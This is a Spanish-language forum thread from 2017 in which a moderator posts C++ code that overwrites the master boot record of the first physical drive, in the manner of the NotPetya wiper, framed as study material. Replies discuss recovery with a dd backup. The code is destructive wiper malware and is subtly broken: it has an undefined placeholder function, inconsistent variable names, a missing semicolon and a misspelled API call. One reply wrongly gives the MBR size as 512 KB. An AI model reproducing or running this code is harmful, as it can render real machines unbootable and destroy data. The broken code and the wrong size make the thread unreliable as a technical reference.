3. Reescribiendo el Boot Master Record
Páginas: [1]   Ir Abajo
« anterior próximo »

Reescribiendo el Boot Master Record

  • 4 Respuestas
  • 7090 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado sadfud

  • *
  • Moderator
  • Mensajes: 202
  • Actividad:
    10%
  • Country: cl
  • Reputación 10
  • Skype: SadFud75
    • Ver Perfil
    • Blog

Reescribiendo el Boot Master Record

  • en: Julio 06, 2017, 02:42:53 pm

Buenas underc0deanos,

Supongo que todo el mundo ha visto las noticias de NotPetya, y si alguno ha leído los análisis técnicos sabrá que era un wiper y no un ransomware, debido a que reescribe el sector de arranque del disco duro dejando el pc inservible una vez se haya reiniciado/apagado.

A continuación dejo un código que tenia guardado sobre como hacer esto.

Espero que sea útil para poder estudiarlo.
 
Código: C++
  1. /*
  2.   Rewrite boot master record code sample
  3.   Credits to 0memory
  4. */
  5. #include <windows.h>
  6. #include <iostream>
  7.  
  8. using namespace std;
  9.  
  10. #define MBR_SIZE 512
  11. int main(int argc, char const *argv[]) {
  12.   DWORD write;
  13.   char mbrdata[MBR_SIZE];
  14.   Underc0de(&mbrData, (sizeof mbrdata));
  15.  
  16.   HANDLE MasterBootRecord = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL)
  17.   if (WriteFile(MasterBootRecord, mbrData, MBR_SIZE, &write, NULL) == TRUE){
  18.     cout << "MBR overwritten" << endl;
  19.     Sleep(5000);
  20.     Exitprocess(0);
  21.   } else {
  22.     cout << "MBR not overwritten" << endl;
  23.     Sleep(5000);
  24.     Exitprocess(0);
  25.   }
  26.   CloseHandle(MasterBootRecord);
  27.   return 0;
  28. }

Un saludo
« Última modificación: Julio 06, 2017, 03:00:31 pm por Gabriela »
En línea
Mi blog: You are not allowed to view links. Register or Login
Si necesitas ayuda, no dudes en mandar MP

Desconectado RuidosoBSD

  • *
  • Underc0der
  • Mensajes: 183
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Email

Re:Reescribiendo el Boot Master Record

  • en: Julio 06, 2017, 06:19:07 pm
Gracias por el aporte. Puede resolverse con un disco de recuperacion ¿no?
En línea

Desconectado PikachuDorado

  • *
  • Ex-Staff
  • *****
  • Mensajes: 372
  • Actividad:
    0%
  • Reputación 1
  • Im just a Pikachu
    • Ver Perfil
    • Soporte Ava

Re:Reescribiendo el Boot Master Record

  • en: Julio 12, 2017, 07:44:18 am
Estas cada dia mas violento @You are not allowed to view links. Register or Login sos un crack! ♥
En línea
Pikaa~

Desconectado animanegra

  • *
  • Moderador
  • Mensajes: 273
  • Actividad:
    76.67%
  • Country: 00
  • Reputación 10
    • Ver Perfil

Re:Reescribiendo el Boot Master Record

  • en: Julio 12, 2017, 06:05:57 pm
El MBR son los primero 512 KB del disco duro (recordarme la dimension si estoy confundido), lo mas sencillo es hacer lo que se hacia antes cuando instalar linux y windows era problematico. Haces un:
dd if=/dev/sda of=copiaMBR bs=512 count=1
y asi tienes una copia del MBR por si las moscas. ^^
Para restaurarla poner el if y el of en sentido inverso y listos.

El petya y esos ¿Solo joden el MBR?
En línea

Lo siento, no contesto dudas por MP, si tienes dudas las planteas en el foro.

Desconectado RuidosoBSD

  • *
  • Underc0der
  • Mensajes: 183
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Email

Re:Reescribiendo el Boot Master Record

  • en: Julio 13, 2017, 05:24:43 am
You are not allowed to view links. Register or Login
El petya y esos ¿Solo joden el MBR?
No, es una de las características pero no la única
En línea
Páginas: [1]   Ir Arriba
« anterior próximo »